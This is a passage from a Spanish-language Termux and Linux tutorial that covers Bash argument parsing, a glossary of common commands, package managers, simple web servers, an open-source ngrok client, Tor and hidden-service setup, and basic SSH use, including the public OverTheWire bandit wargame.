cancelando el resto de iteraciones del bucle. ##### exit El comando exit utilizando dentro de un script, nos permite indicar que queremos que se finalice el programa inmediatamente y el comando enviará una señal de cierre a **Bash**. El resto del código que queda por analizar ya lo vimos en ejemplos similares en el [capítulo 5: Introducción a Bash](#cap%C3%ADtulo-5-introducci%C3%B3n-a-bash). Bash es un lenguaje pontente y no existe una única forma de hacer las cosas. Puedes parsear los argumentos perfectamente usando un bucle for y recorriendo los argumentos ```bash #!/usr/bin/bash for (( i=1; i <= "$#"; i++ )) do # bucle for clásico next=$((i+1)) # Guarda el siguiente argumento en la variable next if [[ ${!i} == "-h" || ${!i} == "--help" ]]; then # Si el argumento es -h o --help echo "Este es el mansaje de ayuda" exit elif [[ ${!i} == "-n" || ${!i} == "--name" ]]; then echo "Hola ${!next}" exit fi done ``` Esta forma de hacer el mismo comando **saludar** tiene la deventaja de que no puede procesar múltiples argumentos como **saludar -hn Manolo**, pero tiene la ventaja de que el código es mas corto. [Tabla de Contenidos](#tabla-de-contenidos) ----- ## Capítulo 10: Comandos Intermedios Los sistemas GNU/Linux tiene una inmensidad de comandos distintos. Muchos de ellos vienen instalados por defecto y otros podremos descargarlos. En este capítulo prestaremos atención a los mas populares. ### 7z Comprime archivos en múltiples formatos con muy buena compresión. ### apt Descarga paquetes de Gnu/Linux ### apt-get Descarga paquetes de Gnu/Linux ### awk Lenguaje de programación orientado al manejo de texto ### base64 Codifica o decodifica base64 ### cal Calendario ### clang Compilador de C/C++/Objective C ### curl Cliente de múltiples protolos. Principalmente utilizado por su capacidad como cliente HTTP ### dialog Utiliza diálogos en la terminal ### dig Consulta los registro DNS de un dominio ### dpkg Gestor de paquetes de Debian ### espeak Comando text-to-speach que reproduce el texto en el altavoz o crea un archivo reproducible ### figlet Crea textos grandes a base de caracteres. ### find Busca archivos en sistema de ficheros ### file Mueatra meta información a cerca de ub fichero. ### gcc Compila un programa escrito en C ### g++ Compila un programa escrito en C++ ### gdb Debuger para encontrar erroes en programas ### gh Utiliza github en la terminal ### git Maneja repositorios ### grep Encuentra palabras y patrones en un texto ### go Compila un programa escrito en Go ### gotty Comparte tu terminal para que otras personas puede ver lo mismo que tú ### gzip Comprime y descomprime archivos con extensión .z ### head Muestra solo el número indicado de caracteres ### htop Muestra información sobre procesos ### httping Mide la latencia de un servidor web/http ### hugo Generador de sitios estáticos ### iverilog Lenguaje de programación para modelado de circuitos electrónicos ### jq Comando para parsear JSON ### less Abre archivos muy grandes rápidamente cargándolo en bloques ### lighttpd Servidor web rápido, pequeño y flexible ### lua Ejecuta código lua ### luarocks Instala módulos de lua ### logcat Accede al registro de mensajes de Android para debuggear aplicaciones ### lynx Navegador Web de terminal ### make Compila proyectos ### md5sum Obten un hash (utilizando el algoritmo md5) de un archivo/texto ### more Muestra texto en pantalla, facilita la navegación ### mongodb Base de datos NoSQL ### mono Compila C# en GNU/Linux ### mpg123 Reproductor de música ### nc Herramienta con múltiples utiidades de red integradas ### netlify Maneja la creación de sitios web en netlify ### nmap Escaner de puertos de red ### ncat Versión mejorada de nc, se instala conjuntamente a nmap ### nginx Servidor Web y proxy web muy completo. ### ngrok Comparte tus servicios sin abrir puertos ### nodejs Ejecuta código javascript y crea aplicaciones de todo tipo. ### npm Instala paquetes de node ### openssl Suit de algorimtos criptográficos ### openvpn Establece un tunel VPN ### perl Intérprete del lenguaje de programación Perl ### php Intérprete del lenguaje de programación PHP ### postgresql Base de datos SQL ### pkill Mata un proceso ### proot Emula un entorno root ### proxychains-ng Utiliza cadenas de proxies ### python Intérprete del lenguaje python2 ### python3 Intérprete del lenguaje python3 ### qemu Emula procesadores y sistemas operativos ### quickjs Pequeño motor y librería de javascript ### radare2 Desensamblador, debugger y editor hexadecimal para trabajar con binarios ### ruby Intérprete para el lenguaje de programación Ruby ### rust Compilador código Rust ### scp Copia y sube archivos utilizando un tunel SSH ### sed Filtra y remplaza texto ### shasum Obten un hash de un archivo/text utilizando sha ### ssh Ingresa a máquinas remotas m ### steghide Esconde texto en imágenes y audios ### strings Imprime todo lo que pueda ser interpretado como texto de un archivo de bytes/caracteres ### sqlite Pequeña y potente base de datos SQL ### tail Muestra el final de un fichero o texto ### tar Comprime y descomprime archivos en múltiples formatos ### top Muestra un resumen de los procesos del sistema ### tor Establece un circuito virtual en la red Tor. ### torsocks Utiliza un comando con Tor. ### tsc Compilador del lenguaje Typescript ### unrar Comprime y descomprime archivos .rar ### unzip Comprime y descomprime archivos .zip ### which Muestra la ruta de instalación de un archivo. ### whois Cliente que nuestra información sobre direcciones ### xxd Muestra un fichero como hexadecimal ### yes Confirma automáticamente las opciones interactivas de un comando [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 11: Proot-Distro Proot distro es una versión custom del comando proot que ha sido diseñada para Termux. Con proot-distro podremos instalar distribuciones populares de GNU/Linux en Termux. Esto nos va a permitir instalar programas de esas distribuciones y disponer del sistema de ficheros común de GNU/Linux. ### Lista las distribuciones disponibles ```bash proot-distro list ``` Mustra las distribuciones de GNU/Linux disponibles, su nombre, su alias y su estado de instalación ### Instala una distribución ```bash proot-distro install alpine ``` Para instalar una distribución, debes utilizar el alias correspondiente a la distribución que deseas instalar. ### Arranca una distribución ```bash proot-distro login alpine ``` ### Haz copia de seguridad de una distribución ```bash proot-distro backup alpine ``` ### Elimina una distribución ```bash proot-distro remove alpine ``` ### Elimina y reinstala una distribución ```bash proot-distro reset alpine ``` ### Recupera un sistema mediante copia de seguridad ```bash proot-distro restore alpine ``` ### Arranca una distribución aislada de Termux ```bash proot-distro login alpine --isolated ``` ### Ejecuta un comando desde una distribución ```bash proot-distro login alpine --isolated -- pwd ``` [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capitulo 12: Introducción a Sistemas Linux Linux es un sistema operativo libre y gratuito que ha ganado una gran popularidad debido a su estabilidad, seguridad y flexibilidad. Aunque Linux es conocido por ser utilizado en servidores, también es posible utilizarlo en dispositivos móviles como smartphones y tablets. #### ¿Qué es Linux? Linux es un sistema operativo similar a Windows o macOS, pero con una diferencia importante: es de código abierto. Esto significa que cualquiera puede descargar el código fuente de Linux y modificarlo para adaptarlo a sus necesidades. Además, Linux está disponible de forma gratuita para cualquier persona que quiera utilizarlo. #### ¿Qué es una distribución de Linux? Aunque Linux es un sistema operativo por sí solo, existen muchas distribuciones de Linux disponibles, cada una con sus propias características y enfoques. Una distribución de Linux es una versión de Linux que incluye un conjunto de programas y aplicaciones preinstalados y una interfaz de usuario específica. Algunas distribuciones de Linux están diseñadas para usuarios principiantes, mientras que otras están diseñadas para usuarios avanzados. #### Distribuciones Linux + [Ubuntu](https://help.ubuntu.com/) Es una de las distribuciones de Linux más populares y se utiliza ampliamente en todo el mundo. Es conocida por su facilidad de uso y su gran cantidad de aplicaciones disponibles. También tiene una gran comunidad de usuarios que puede proporcionar ayuda y soporte. + [Debian](https://www.debian.org/doc/) Es una distribución de Linux estable y confiable. Está diseñada para ser utilizada en servidores, pero también es adecuada para usuarios de escritorio. Debian se enfoca en la estabilidad y la seguridad, por lo que sus actualizaciones son más lentas que en otras distribuciones. + [Fedora](https://docs.fedoraproject.org/es/docs/) Es una distribución de Linux que está diseñada para usuarios avanzados. Incluye herramientas de desarrollo y es conocida por ser una plataforma para nuevas tecnologías. Fedora es la distribución de prueba para Red Hat Enterprise Linux, que es utilizado en empresas. + [Arch Linux](https://wiki.archlinux.org/title/Arch_Linux_(Espa%C3%B1ol)) Es una distribución de Linux que se enfoca en la simplicidad y el minimalismo. Está diseñada para usuarios avanzados que desean un control completo sobre su sistema. Arch Linux es una distribución rolling release, lo que significa que las actualizaciones se liberan continuamente. + [Kali Linux](https://kali-linux.net/) Es una distribución de Linux especializada en seguridad informática. Incluye una gran cantidad de herramientas de hacking ético y pruebas de penetración. + [Alpine](https://docs.alpinelinux.org/) Está diseñada para ser liviana y segura. Es popular en entornos de contenedores y en dispositivos de IoT. Al igual que Termux, Linux se basa en la línea de comandos para realizar tareas, aunque también se puede instalar una interfaz gráfica. Linux también tiene una gran cantidad de herramientas y paquetes disponibles que se pueden instalar y personalizar para adaptarse a tus necesidades. [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capitulo 13: Uso básico de Debian ### Instalación de paquetes en Debian #### apt `apt` es el gestor de paquetes de Debian. Permite instalar, actualizar y desinstalar paquetes en el sistema. Aquí tienes algunos comandos útiles: - `apt update`: actualiza la lista de paquetes disponibles en los repositorios. - `apt upgrade`: actualiza todos los paquetes instalados en el sistema. - `apt install <nombre_del_paquete>`: instala un paquete en el sistema. - `apt remove <nombre_del_paquete>`: desinstala un paquete del sistema. - `apt search <nombre_del_paquete>`: busca un paquete en los repositorios disponibles. - `apt show <nombre_del_paquete>`: muestra información detallada sobre un paquete. Es importante tener en cuenta que necesitas ejecutar `apt update` para actualizar la lista de paquetes disponibles antes de instalar cualquier paquete. #### dpkg `dpkg` es la herramienta de bajo nivel para gestionar paquetes de Debian. Permite instalar, desinstalar, configurar y verificar paquetes en el sistema. Aquí tienes algunos comandos útiles: - `dpkg -i <nombre_del_paquete.deb>`: instala un paquete .deb en el sistema. - `dpkg -r <nombre_del_paquete>`: desinstala un paquete del sistema. - `dpkg -L <nombre_del_paquete>`: muestra una lista de archivos que pertenecen a un paquete. - `dpkg -S <nombre_del_archivo>`: muestra el paquete que contiene un archivo en particular. - `dpkg-reconfigure <nombre_del_paquete>`: reconfigura un paquete ya instalado. Ten en cuenta que `dpkg` no resuelve automáticamente las dependencias, por lo que es posible que necesites instalar manualmente las dependencias de un paquete antes de instalar el paquete en sí. [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 14: Uso básico de Ubuntu ### Instalación de paquetes en Ubuntu #### apt `apt` es el gestor de paquetes de Ubuntu. Permite instalar, actualizar y desinstalar paquetes en el sistema. Aquí tienes algunos comandos útiles: - `sudo apt update`: actualiza la lista de paquetes disponibles en los repositorios. - `sudo apt upgrade`: actualiza todos los paquetes instalados en el sistema. - `sudo apt install <nombre_del_paquete>`: instala un paquete en el sistema. - `sudo apt remove <nombre_del_paquete>`: desinstala un paquete del sistema. - `sudo apt search <nombre_del_paquete>`: busca un paquete en los repositorios disponibles. - `sudo apt show <nombre_del_paquete>`: muestra información detallada sobre un paquete. Es importante tener en cuenta que necesitas ejecutar `sudo apt update` para actualizar la lista de paquetes disponibles antes de instalar cualquier paquete. #### dpkg `dpkg` es la herramienta de bajo nivel para gestionar paquetes en Ubuntu. Permite instalar, desinstalar, configurar y verificar paquetes en el sistema. Aquí tienes algunos comandos útiles: - `sudo dpkg -i <nombre_del_paquete.deb>`: instala un paquete .deb en el sistema. - `sudo dpkg -r <nombre_del_paquete>`: desinstala un paquete del sistema. - `sudo dpkg -L <nombre_del_paquete>`: muestra una lista de archivos que pertenecen a un paquete. - `sudo dpkg -S <nombre_del_archivo>`: muestra el paquete que contiene un archivo en particular. - `sudo dpkg-reconfigure <nombre_del_paquete>`: reconfigura un paquete ya instalado. Ten en cuenta que `dpkg` no resuelve automáticamente las dependencias, por lo que es posible que necesites instalar manualmente las dependencias de un paquete antes de instalar el paquete en sí. [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 15: Uso básico de Alpine ### Instalación de paquetes en Alpine #### apk `apk` es el gestor de paquetes de Alpine Linux. Permite instalar, actualizar y desinstalar paquetes en el sistema. Aquí tienes algunos comandos útiles: - `apk update`: actualiza la lista de paquetes disponibles en los repositorios. - `apk upgrade`: actualiza todos los paquetes instalados en el sistema. - `apk add <nombre_del_paquete>`: instala un paquete en el sistema. - `apk del <nombre_del_paquete>`: desinstala un paquete del sistema. - `apk search <nombre_del_paquete>`: busca un paquete en los repositorios disponibles. - `apk info <nombre_del_paquete>`: muestra información detallada sobre un paquete. Es importante tener en cuenta que necesitas ejecutar `apk update` para actualizar la lista de paquetes disponibles antes de instalar cualquier paquete. #### Otros comandos útiles - `apk add --no-cache <nombre_del_paquete>`: instala un paquete sin caché. Esto reduce la cantidad de espacio utilizado por el paquete. - `apk add --virtual <nombre_del_paquete>`: instala un paquete como una dependencia virtual. Esto es útil si necesitas instalar un paquete que no existe en los repositorios, pero que es necesario para que otro paquete funcione correctamente. - `apk cache clean`: limpia la caché de paquetes para liberar espacio en disco. Ten en cuenta que `apk` también puede ser utilizado para instalar paquetes desde fuentes externas, como archivos APK o repositorios de terceros. Sin embargo, debes tener cuidado al hacer esto, ya que los paquetes pueden no ser seguros o compatibles con tu sistema. [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 16: Uso básico de Fedora ### Instalación de paquetes en Fedora #### dnf `dnf` es el gestor de paquetes por defecto en Fedora. Permite instalar, actualizar y desinstalar paquetes en el sistema. Aquí tienes algunos comandos útiles: - `dnf update`: actualiza todos los paquetes instalados en el sistema. - `dnf upgrade`: actualiza todos los paquetes instalados en el sistema, incluyendo los que requieren cambios en la configuración. - `dnf install <nombre_del_paquete>`: instala un paquete en el sistema. - `dnf remove <nombre_del_paquete>`: desinstala un paquete del sistema. - `dnf search <nombre_del_paquete>`: busca un paquete en los repositorios disponibles. - `dnf info <nombre_del_paquete>`: muestra información detallada sobre un paquete. Es importante tener en cuenta que necesitas ejecutar `dnf update` para actualizar todos los paquetes instalados en el sistema. #### Otros comandos útiles - `dnf history`: muestra un registro detallado de todas las operaciones realizadas por `dnf`, incluyendo las actualizaciones e instalaciones de paquetes. - `dnf repoquery <nombre_del_paquete>`: busca un paquete en los repositorios disponibles sin instalarlo. - `dnf list installed`: muestra una lista de todos los paquetes instalados en el sistema. - `dnf clean all`: limpia la caché de paquetes y metadatos para liberar espacio en disco. Ten en cuenta que `dnf` también puede ser utilizado para instalar paquetes desde fuentes externas, como archivos RPM o repositorios de terceros. Sin embargo, debes tener cuidado al hacer esto, ya que los paquetes pueden no ser seguros o compatibles con tu sistema. [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 17: Introducción a Servicios Los servicios son programas que se ejecutan en segundo plano, es decir, que están funcionando en la computadora sin que el usuario tenga que interactuar directamente con ellos. Estos programas pueden ser muy variados y realizar diferentes funciones. Por ejemplo, un servicio puede ser el que controla el acceso a una red, otro puede ser el que permite imprimir documentos, otro puede ser el que guarda archivos en un servidor, etc. Cada servicio se comunica con otros programas o dispositivos a través de puertos específicos, que funcionan como una especie de "ventana" por donde los datos entran y salen. Cuando utilizas una aplicación o accedes a un sitio web, estás interactuando con uno o varios servicios que están funcionando en segundo plano. Por ejemplo, si estás utilizando un navegador para acceder a un sitio web, el navegador está utilizando el servicio de red para conectarse a Internet y el servicio de DNS para buscar la dirección IP del sitio web. En resumen, los servicios son programas que realizan funciones específicas en segundo plano, y se comunican con otros programas y dispositivos a través de puertos específicos. [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 18: Creando un Servidor Hay muchos tipo de servidores y muchos programas que te permiten crearlos. #### Creando un servidor Web con Python3 **1. Instalar Python 3:** Para instalar Python 3 en Termux, sigue estos pasos: 1. Abre la aplicación Termux en tu dispositivo Android. 2. Ejecuta el siguiente comando para actualizar los paquetes existentes: ```bash pkg update && pkg upgrade ``` 3. Ahora, ejecuta el siguiente comando para instalar Python 3: ```bash pkg install python3 ``` 4. Una vez que se complete la instalación, verifica que Python 3 esté instalado correctamente ejecutando el siguiente comando: ```bash python3 --version ``` Debería mostrar la versión de Python instalada en tu sistema. **2. Crear una carpeta para el servidor web:** Ahora, vamos a crear una carpeta para nuestro servidor web. Para ello, ejecuta el siguiente comando: ```bash mkdir mywebsite ``` Este comando creará una carpeta llamada "mywebsite" en el directorio actual. **3. Crear un archivo HTML:** Ahora, vamos a crear un archivo HTML muy simple para nuestra página web. Para ello, ejecuta los siguientes comandos: ```bash cd mywebsite echo "<html><body><h1>Mi sitio web</h1></body></html>" > index.html ``` El primer comando nos lleva al directorio "mywebsite". El segundo comando crea un archivo llamado "index.html" en el directorio actual y agrega el código HTML necesario para mostrar un encabezado "Mi sitio web" en nuestra página. **4. Agregar un archivo de texto de ejemplo:** Para agregar un archivo de texto de ejemplo, ejecuta los siguientes comandos: ```bash echo "Este es un archivo de texto de ejemplo." > example.txt ``` Este comando crea un archivo de texto llamado "example.txt" en el directorio actual y agrega el texto "Este es un archivo de texto de ejemplo." en el archivo. **5. Iniciar el servidor web:** Ahora que hemos creado nuestra carpeta y nuestros archivos, podemos iniciar el servidor web utilizando el comando `python3 -m http.server`. Para ello, ejecuta los siguientes comandos: ```bash python3 -m http.server 8000 ``` El comando inicia el servidor web en el puerto 8000 (puedes elegir cualquier otro puerto si lo deseas). **6. Acceder a la página web:** Para acceder a la página web, abre un navegador en tu dispositivo Android y escribe la siguiente dirección URL: ``` http://localhost:8000/ ``` Deberías ver la página web con el encabezado "Mi sitio web". **7. Acceder al archivo de texto:** Para acceder al archivo de texto, abre un navegador en tu dispositivo Android y escribe la siguiente dirección URL: ``` http://localhost:8000/example.txt ``` Deberías ver el contenido del archivo de texto "example.txt". ¡Listo! Ahora tienes un servidor web en ejecución en tu dispositivo Android, creado con Python 3 en Termux. Puedes personalizar la página web agregando más contenido y archivos a la carpeta "mywebsite". En el final del [Capítulo 25: Protocolo HTTP](#cap%C3%ADtulo-25-protocolo-http) también tienes un servidor web mínino usando Bash y ncat. [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 19: Ngrok y Exponer Servicios #### Qué es Ngrok? Ngrok es una herramienta que permite crear un túnel seguro hacia un servidor local, lo que permite exponer aplicaciones o servicios que se ejecutan en un equipo local a Internet. Básicamente, permite que una aplicación web que se ejecuta en un equipo local sea accesible a través de una URL pública. Esto es muy útil para desarrolladores que necesitan probar sus aplicaciones web en diferentes dispositivos o compartir sus aplicaciones con otros. Ngrok crea una conexión segura entre su equipo local y la nube, lo que le permite acceder a su servidor local desde cualquier lugar del mundo. También proporciona un panel de control web para administrar su conexión y configurar diferentes opciones, como la autenticación y el registro de solicitudes. Ngrok es fácil de usar y se puede instalar en diferentes sistemas operativos. Además, tiene una versión gratuita y varias opciones de pago con características adicionales, como el uso de subdominios personalizados y la asignación de puertos dedicados. #### Qué es un servicio local y cómo se expone? Un servicio local es un servicio o aplicación que se ejecuta en un equipo local, como una aplicación web, una API o un servidor de base de datos. Estos servicios suelen estar disponibles solo en el equipo donde están instalados y no son accesibles desde otros equipos en la red o desde Internet. Los usuarios pueden utilizar Ngrok para exponer estos servicios locales y hacerlos accesibles desde cualquier lugar del mundo a través de una URL pública. Esto es útil para desarrolladores que necesitan probar sus aplicaciones en diferentes dispositivos o compartir sus aplicaciones con otros, ya que les permite acceder a sus servicios locales sin tener que exponerlos a Internet directamente. Además, Ngrok facilita la configuración de conexiones seguras y elimina la necesidad de abrir puertos en el router, lo que lo hace una solución fácil y segura para exponer servicios locales. #### Por que utilizar una versión opensource en lugar de la oficial La seguridad es un factor importante cuando se trata de exponer servicios a través de Internet. Mientras que Ngrok es una herramienta popular y útil para crear túneles seguros y exponer servicios locales, algunos usuarios pueden tener preocupaciones sobre la seguridad de su código cerrado y la privacidad de sus datos. Una de las ventajas de utilizar una versión de Ngrok de código abierto (open source) es que cualquier persona puede revisar y auditar el código para detectar posibles vulnerabilidades y problemas de seguridad. Esto significa que hay una mayor transparencia y confianza en el software, ya que los usuarios pueden ver exactamente lo que está sucediendo en el código subyacente. Además, los desarrolladores de la versión open source de Ngrok pueden responder a las preocupaciones de seguridad de la comunidad y proporcionar soluciones rápidas en caso de que se descubran vulnerabilidades. También hay una comunidad de usuarios activa que puede proporcionar soporte y asistencia en caso de que surjan problemas. Por otro lado, al ser una versión cerrada de código (closed source), los usuarios no pueden revisar el código y tienen que confiar en que la empresa detrás de Ngrok está tomando las medidas de seguridad necesarias para proteger sus datos y privacidad. En conclusión, utilizar una versión open source de Ngrok proporciona una mayor transparencia y seguridad, ya que los usuarios pueden revisar el código y confiar en la comunidad de usuarios para solucionar posibles vulnerabilidades y problemas de seguridad. #### cómo instalar un cliente de ngrok opensource 1. Abre la aplicación Termux en tu dispositivo Android. 2. Instala las dependencias necesarias ejecutando el siguiente comando: ```bash pkg install openssh tmux ``` 3. Descarga el cliente de ngrok opensource en tu dispositivo Android ingresando el siguiente comando: ```bash git clone https://github.com/stringmanolo/ngrok.git ``` 4. Navega hasta el directorio donde se encuentra el cliente de ngrok ingresando el siguiente comando: ```bash cd ngrok ``` 5. Configura el cliente de ngrok utilizando el asistente ingresando el siguiente comando: ```bash chmod 775 ngrokWizard.sh ./ngrokWizard.sh ``` Sigue las instrucciones que se muestran en pantalla para configurar el cliente de ngrok. Esto incluirá generar una clave pública ECDSA, pegar la clave en la página de configuración de ngrok y establecer el puerto de tu servidor. 6. Una vez que hayas configurado el cliente de ngrok utilizando el asistente, puedes iniciar y detener el cliente utilizando los siguientes comandos: ```bash ./ngrokStart.sh ``` y ```bash ./ngrokStop.sh ``` El primer comando iniciará el cliente de ngrok y establecerá una conexión inversa SSH con el servidor, lo que permitirá que el tráfico se reenvíe a través de ngrok. El segundo comando detendrá la conexión SSH y cerrará el cliente de ngrok. Asegúrate de establecer el puerto correcto cada vez que ejecutes el comando `ngrokStart.sh`. Ahora puedes usar el cliente de ngrok opensource para exponer tu servidor web a través de ngrok en tu dispositivo Android usando Termux. Recuerda que la URL pública que te proporciona ngrok cambiará cada vez que ejecutes el comando `ngrokStart.sh`, por lo que es posible que debas actualizar la URL que compartes con otros usuarios cada vez que la uses. [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 20: Tor, Configuración y Uso #### Qué es Tor? Tor (The Onion Router) es una red de comunicaciones en línea diseñada para proporcionar anonimato y privacidad a los usuarios de Internet. Fue desarrollado originalmente por la Marina de los Estados Unidos para proteger las comunicaciones gubernamentales, pero posteriormente se convirtió en un proyecto de código abierto para permitir que cualquier persona pueda utilizarlo. Tor funciona enrutando las conexiones de Internet a través de una serie de nodos (también llamados "nodos de cebolla" o "onion routers") distribuidos por todo el mundo. Cada nodo en la red solo conoce la dirección IP del nodo anterior y el siguiente nodo en la cadena, lo que hace que sea difícil (aunque no imposible) rastrear las comunicaciones de un usuario de Internet. Además, Tor también utiliza técnicas de cifrado para proteger las comunicaciones y garantizar que solo el usuario final pueda leer el contenido de los mensajes. Esto hace que Tor sea una herramienta valiosa para aquellos que desean proteger su privacidad y anonimato en línea, ya sea por razones políticas, de seguridad o simplemente por preferencia personal. #### Instalación, configuración y uso ##### 1 Abre Termux y asegúrate de que estás en la última versión actualizada. Para actualizar, escribe en la terminal: ```bash apt update && apt upgrade ``` ##### 2 A continuación, es necesario instalar el paquete de Tor y torify. Para hacerlo, escribe en la terminal: ```bash pkg install tor torsocks ``` ##### 3 Añade las siguientes líneas al archivo de configuración de Tor, usando el comando `echo`: ```bash echo 'ControlPort 9051' >> $PREFIX/etc/tor/torrc && echo 'CookieAuthentication 1' >> $PREFIX/etc/tor/torrc ``` ##### 4 Inicia el servicio de Tor en background usando el ampersand: ```bash tor & ``` Nota: El ampersand al final del comando permite que el proceso se ejecute en segundo plano, lo que significa que puedes seguir utilizando la terminal mientras Tor está activo. ##### 5 Para asegurarte de que Tor está funcionando, ejecuta: ```bash torify curl -s https://check.torproject.org/ | grep -q "Congratulations" ``` Este comando debería mostrar un mensaje de felicitación si estás usando Tor. Si no ves el mensaje, es posible que algo esté mal configurado o que Tor no esté funcionando correctamente. ##### 6 Ahora puedes usar Tor con cualquier aplicación que soporte proxies SOCKS5, incluyendo `curl`. Simplemente precede cualquier comando que quieras ejecutar con `torsocks`. Por ejemplo: ```bash torsocks curl https://example.com ``` ##### 7 Cuando hayas terminado de usar Tor, detén el servicio ejecutando el siguiente comando: ```bash killall tor ``` ¡Listo! Ahora sabes cómo instalar, configurar y usar Tor en Termux. Recuerda que el uso de Tor es importante para proteger tu privacidad y anonimato en línea. [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 21: Servicios Ocultos ### Qué es? Un Hidden Service (también conocido como Servicio Oculto) es un sitio web alojado en la red Tor (conocida también como Dark Web o internet profunda) que se encuentra en una ubicación desconocida para los usuarios normales de la web y que solo puede ser accedido a través de la red Tor. En lugar de tener una dirección IP pública y estar alojado en un servidor web estándar, un Hidden Service se aloja en una red anónima y utiliza una dirección web única que termina en ".onion". Cuando un usuario intenta acceder a un sitio web alojado en un Hidden Service, su conexión se enruta a través de una serie de nodos de la red Tor, lo que proporciona un alto nivel de anonimato. Los Hidden Services se pueden utilizar para una amplia variedad de propósitos, desde sitios web de periodismo y activismo político hasta mercados en línea y comunidades en línea privadas. Algunos usuarios también utilizan Hidden Services para alojar sus propios sitios web personales sin revelar su ubicación física o dirección IP pública. En resumen, los Hidden Services ofrecen una forma segura y anónima de alojar y acceder a contenido en línea, lo que los hace útiles para una variedad de aplicaciones en línea que requieren privacidad y anonimato. ### Crear un servicio oculto ##### 1 Crea una carpeta para el sitio web y otra para el hidden service utilizando los siguientes comandos: ```bash mkdir -p $PREFIX/var/lib/tor/hidden_service/mywebsite; mkdir -p $PREFIX/etc/tor/hidden_service; ``` ##### 2 Cambia los permisos de la carpeta: ```bash chmod 700 $PREFIX/var/lib/tor/hidden_service/mywebsite ``` ##### 3 Agrega las líneas de configuración de Tor al archivo `torrc` utilizando el siguiente comando: ```bash echo -e "HiddenServiceDir $PREFIX/var/lib/tor/hidden_service/mywebsite\nHiddenServicePort 80 127.0.0.1:8000" >> $PREFIX/etc/tor/torrc; ``` ##### 4 Reinicia el servicio Tor ejecutando el siguiente comando: ```bash killall tor; tor & ``` ##### 5 Crea un archivo `index.html` para el sitio web utilizando el siguiente comando: ```bash echo "Hello, world!" > $PREFIX/var/lib/tor/hidden_service/mywebsite/index.html; ``` ##### 6 Inicia un servidor web local en la carpeta `mywebsite` usando el siguiente comando: ```bash cd $PREFIX/var/lib/tor/hidden_service/mywebsite; python3 -m http.server 8000 & ``` ##### 7 Obten la dirección de tu servicio: ```bash cat $PREFIX/var/lib/tor/hidden_service/mywebsite/hostname ``` ##### 8 Accede al sitio web a través del Hidden Service ejecutando el siguiente comando en la terminal: ```bash torify curl http://<hidden-service-address>.onion/; ``` Reemplaza `<hidden-service-address>` con la dirección del Hidden Service que obtuviste en el paso 7. Otra forma de comprobar si funciona es utilizando el servicio tor2web. Te vas a [este](https://www.tor2web.fi/) enlace en cualquier navegador e introduces la dirección de tu servicio. Si funciona verás tu página web con el mensaje "Hello World". Esta web sirve para poder visualizar páginas web alojadas en la red tor en tu navegador sin necesidad de instalar el navegador de tor. ##### 9 Para detener el servicio Tor y el servidor web de Python, ejecuta los siguientes comandos en la terminal: ```bash killall tor; killall python3; ``` Con estos pasos, se creará una carpeta para el sitio web y otra para el hidden service, se configurará el archivo de Tor para exponer el servidor web local en el Hidden Service, se creará un archivo `index.html` para el sitio web y se iniciará un servidor web local. Cualquier persona con conexión a tor podrá acceder a tu servicio utilizando el dominio .onion. [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 22: SSH, SCP y SSHD ### SSH SSH (Secure Shell) es un protocolo de red que permite a los usuarios acceder y controlar de forma remota otros dispositivos a través de una conexión segura. En Termux, también es posible utilizar SSH para establecer una conexión remota con otros sistemas y ejecutar comandos en ellos. A continuación, te mostraré cómo puedes utilizar SSH en Termux. #### Instalación de OpenSSH Para utilizar SSH en Termux, primero debes instalar el paquete OpenSSH. Puedes hacerlo ejecutando el siguiente comando en la terminal de Termux: ```bash pkg install openssh ``` #### Generación de claves SSH Antes de utilizar SSH, es recomendable generar un par de claves SSH para autenticarte de forma segura en los sistemas remotos. Puedes generar un par de claves SSH ejecutando el siguiente comando: ```bash ssh-keygen -t rsa ``` Este comando generará una clave privada y una clave pública en tu directorio de inicio. Puedes dejar los valores predeterminados presionando "Enter" en cada pregunta. #### Conexión SSH Una vez que hayas generado las claves SSH, estás listo para establecer una conexión SSH con un sistema remoto. Utiliza el siguiente comando para conectarte a un sistema remoto ```bash ssh usuario@dirección_ip ``` Reemplaza "usuario" con tu nombre de usuario en el sistema remoto y "dirección_ip" con la dirección IP del sistema remoto al que deseas conectarte, también puedes usar un dominio en lugar de una IP al igual que con las páginas web. Si es la primera vez que te conectas a ese sistema, se te pedirá que confirmes la autenticidad de la clave del host. Verifica que la clave mostrada coincida con la clave del sistema remoto y responde "yes" para agregarla a la lista de conocidos. A continuación, se te solicitará la contraseña del usuario remoto. Ingrésala y presiona "Enter" para establecer la conexión Normalmente ssh se utiliza para obtener acceso a servidores privados pero también hay alguno público. En el siguiente ejemplo veremos como utilizar openssh para conectarnos a un servidor remoto: ```bash ssh [email protected] -p 2220 ``` Cuando te conectas por SSH por primera vez a un servidor es normal que se te muestre un mensaje indicando la huella digital del servidor, por ejemplo: ```bash The authenticity of host '[bandit.labs.overthewire.org]:2220 ([16.16.8.216]:2220)' can't be established. ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? ``` Escribiremos **yes** para continuar la conexión. Lo que estamos haciendo es conectarnos al ordenador con dirección IP 16.16.8.216 usando el protocolo SSH con el usuario bandit0. Nos pedirá una contraseña que también es bandit0. Y con esto ya nos hemos conectado a un ordenador remoto a través de SSH. Si tienes multiples dispositivos, smartphones, computadores, hostings, vpns, ... SSH es una forma segura y simple de obtener una terminal remota. En esta parte se explica solo el cliente (como conectarse a), a continuación se explica como configurar el servicio ssh para que una maquina sea accesible a través de SSH. ### SSHD SSHD es el Daemon de SSH que se ejecuta en segundo plano permaneciendo a la escucha de conexiones entrantes (por defecto en el puerto 8022 en Termux). Este servicio nos sirve para permitir que la máquina sea controlada desde el exterior a través del protocolo SSH. ##### Instalar Alpine en proot-distro En lugar de correr directamente el servidor SSH sobre Termux, vamos a 